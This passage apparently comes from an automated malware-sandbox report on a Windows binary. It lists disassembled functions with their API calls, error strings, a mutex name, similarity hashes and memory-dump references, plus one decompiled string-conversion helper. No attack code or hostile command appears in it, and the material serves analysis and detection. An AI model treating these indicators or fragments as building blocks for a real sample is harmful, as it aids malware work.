                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionException@8H_prolog3RaiseThrow
                                                                                                                        • String ID: invalid vector<T> subscript
                                                                                                                        • API String ID: 1961742612-3016609489
                                                                                                                        • Opcode ID: fab44ce1d1dae61ae089aeca1cea21c363a1796d4b13aecc36bf47c4e90bc980
                                                                                                                        • Instruction ID: a6e5e539db04b224d44c49cbd76516cb9cb0caadd6a0c81cdcc836fb6d3d2af9
                                                                                                                        • Opcode Fuzzy Hash: fab44ce1d1dae61ae089aeca1cea21c363a1796d4b13aecc36bf47c4e90bc980
                                                                                                                        • Instruction Fuzzy Hash: D9018C7190060A9BCB14FF90C986ACDBBF6BF40300F10841AF116A7241CBB8BA41CBA9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004EA6EA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004EA6F1
                                                                                                                        • CloseHandle.KERNEL32(?,?,0000000C,004EA7E2), ref: 004EA716
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseH_prolog3Handle
                                                                                                                        • String ID: Thread.Close.Failed
                                                                                                                        • API String ID: 2454561918-2459011140
                                                                                                                        • Opcode ID: b33911be254bb2e3bf2c396da985e07375198c05fcfac92389e534ea5e76bb51
                                                                                                                        • Instruction ID: a60f36d33c7de2fcffc1cd738488eec57fb9def399ca80a454986dbeea55d5d8
                                                                                                                        • Opcode Fuzzy Hash: b33911be254bb2e3bf2c396da985e07375198c05fcfac92389e534ea5e76bb51
                                                                                                                        • Instruction Fuzzy Hash: 54012BB1901385AEDB20EFB1859589FBF74AF50301F00416EE19293281DB38BE04C796
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 005271C0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?), ref: 005271F8
                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 00527210
                                                                                                                        Strings
                                                                                                                        • {C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag, xrefs: 005271D5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateCurrentMutexProcess
                                                                                                                        • String ID: {C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
                                                                                                                        • API String ID: 3937467467-1122789031
                                                                                                                        • Opcode ID: 774dd8ff3b625c433a32e54056a99a8b65f028f3e289f01f639f49bee0b4a731
                                                                                                                        • Instruction ID: 81e959a291fd83f201deccb960cb41be94144c0baa0daf6cda866095d3dd0a15
                                                                                                                        • Opcode Fuzzy Hash: 774dd8ff3b625c433a32e54056a99a8b65f028f3e289f01f639f49bee0b4a731
                                                                                                                        • Instruction Fuzzy Hash: A4F06271508205AFD600EB14EC46FAFBBE9BFC9301F448829F54586240EA7595088B92
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00480012, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 00480019
                                                                                                                          • Part of subcall function 0047EFBC: __EH_prolog3.LIBCMT ref: 0047EFC3
                                                                                                                          • Part of subcall function 0040D733: char_traits.LIBCPMT ref: 0040D758
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00480064
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$ExceptionException@8RaiseThrowchar_traits
                                                                                                                        • String ID: BER decode error
                                                                                                                        • API String ID: 266644545-1805846189
                                                                                                                        • Opcode ID: bbea0f6ce74b2468e2bc1d46a3b32400e4fb590f6db53a012fd4c4c659c8fee4
                                                                                                                        • Instruction ID: 117fa4b87d6d487ca973219417f4cde726356f78ea7b64f01c4163cc4afe80e0
                                                                                                                        • Opcode Fuzzy Hash: bbea0f6ce74b2468e2bc1d46a3b32400e4fb590f6db53a012fd4c4c659c8fee4
                                                                                                                        • Instruction Fuzzy Hash: C1F06D71900209AEDB10EFE1D906BCDBB74AF14320F508829F201BA1C5CBB84E4CCB61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00507208, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0050720F
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0050724B
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionException@8H_prolog3RaiseThrow
                                                                                                                        • String ID: list<T> too long
                                                                                                                        • API String ID: 1961742612-4027344264
                                                                                                                        • Opcode ID: b0fe6d939dd9a7f8fc27e2432f166d1bdcb5f49772b2785f8bbf6fb886bd56db
                                                                                                                        • Instruction ID: b197ba20cea94d8c8ca3b5b5c2b4d34bc31b48fd2fbf23ace0110750c0b93404
                                                                                                                        • Opcode Fuzzy Hash: b0fe6d939dd9a7f8fc27e2432f166d1bdcb5f49772b2785f8bbf6fb886bd56db
                                                                                                                        • Instruction Fuzzy Hash: 22F08CB6D00119ABCB10EBE0C846ADCBB746F58314F148429E209BB282EB74A945CA94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004FD6E2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004FD6E9
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004FD725
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionException@8H_prolog3RaiseThrow
                                                                                                                        • String ID: list<T> too long
                                                                                                                        • API String ID: 1961742612-4027344264
                                                                                                                        • Opcode ID: 1621299cd655ee5801c33b682aea89a6c2a9f9a70f93daf0a0b131e806f6b8d7
                                                                                                                        • Instruction ID: c898be6f5a3a520538782ba05abb5e948d7319bfe79206e0982e596be52310d6
                                                                                                                        • Opcode Fuzzy Hash: 1621299cd655ee5801c33b682aea89a6c2a9f9a70f93daf0a0b131e806f6b8d7
                                                                                                                        • Instruction Fuzzy Hash: C2F0A0B2D0021D9BCB10EFE4C846BDDB7B4BF58314F14842AE209EB281EB789D45CB94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00502BC6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 00502BCD
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00502C09
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionException@8H_prolog3RaiseThrow
                                                                                                                        • String ID: list<T> too long
                                                                                                                        • API String ID: 1961742612-4027344264
                                                                                                                        • Opcode ID: e684f9e7d1a5cee51ab4980093be47e78791cb173aa973dbce2f9b875f1920c1
                                                                                                                        • Instruction ID: c0aefa15151adcbc0f20e847e684443ce2c4372908de7d31b851bcbdf7ecaf6c
                                                                                                                        • Opcode Fuzzy Hash: e684f9e7d1a5cee51ab4980093be47e78791cb173aa973dbce2f9b875f1920c1
                                                                                                                        • Instruction Fuzzy Hash: 9EF0A0B2D0021D9BDB10EBE4C846ADCBB747F58324F148629E609FB2C2EB749D45CB94
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040C4B6, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3
                                                                                                                        • String ID: !@$)@
                                                                                                                        • API String ID: 431132790-1125940535
                                                                                                                        • Opcode ID: e184ce1c77edb735d31df7bc863df0eec667f4472034b46a30e037005a97abb0
                                                                                                                        • Instruction ID: 107344c2982bdeb8ed19b804b2c2f73b906c45770a1544aeb056ef7413af8c2a
                                                                                                                        • Opcode Fuzzy Hash: e184ce1c77edb735d31df7bc863df0eec667f4472034b46a30e037005a97abb0
                                                                                                                        • Instruction Fuzzy Hash: 5DE048B26506169BC7109F68CC8179DBBA56B88314F050D3DF205EB281D77C99558794
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33A360, Relevance: 5.0, APIs: 4, Instructions: 45memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 90%
                                                                                                                        			E6F33A360(char* _a4, signed int _a8, intOrPtr* _a12) {
				intOrPtr* _t12;
				short* _t13;
				int _t14;
				int _t18;
				char* _t19;

				_t19 = _a4;
				_t13 = 0;
				asm("sbb esi, esi");
				_t18 =  ~_a8 & 0x0000fde9;
				_t14 = MultiByteToWideChar(_t18, 0, _t19, 0xffffffff, 0, 0);
				if(_t14 > 0) {
					_t4 = _t14 + 2; // 0x2
					_t13 = HeapAlloc(GetProcessHeap(), 8, _t14 + _t4);
					MultiByteToWideChar(_t18, 0, _t19, 0xffffffff, _t13, _t14);
					_t12 = _a12;
					if(_t12 != 0) {
						 *_t12 = _t14 - 1;
					}
				}
				return _t13;
			}








                                                                                                                        0x6f33a362
                                                                                                                        0x6f33a36c
                                                                                                                        0x6f33a375
                                                                                                                        0x6f33a378
                                                                                                                        0x6f33a385
                                                                                                                        0x6f33a389
                                                                                                                        0x6f33a38b
                                                                                                                        0x6f33a3a0
                                                                                                                        0x6f33a3a9
                                                                                                                        0x6f33a3af
                                                                                                                        0x6f33a3b5
                                                                                                                        0x6f33a3b8
                                                                                                                        0x6f33a3b8
                                                                                                                        0x6f33a3b5
                                                                                                                        0x6f33a3c0

                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000,?,00000000,00000000,?,6F3375D5,?,00000001,00000000), ref: 6F33A37F
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000002), ref: 6F33A392
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F33A399
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 6F33A3A9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharHeapMultiWide$AllocProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1432973188-0
                                                                                                                        • Opcode ID: 293f44257d25c632d2d9eb448c8c451609da6b0a2be44b368f75e97f63aed275
                                                                                                                        • Instruction ID: 4af41991ab75589ae8fc3341def39c1de76c2ef6b34f59a69a079a8b4dbe007d
                                                                                                                        • Opcode Fuzzy Hash: 293f44257d25c632d2d9eb448c8c451609da6b0a2be44b368f75e97f63aed275
                                                                                                                        • Instruction Fuzzy Hash: 2EF09677600A2D7FEB108AA98C84E67B7EDEB86775F100229FA24D32C0D770EC154671
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%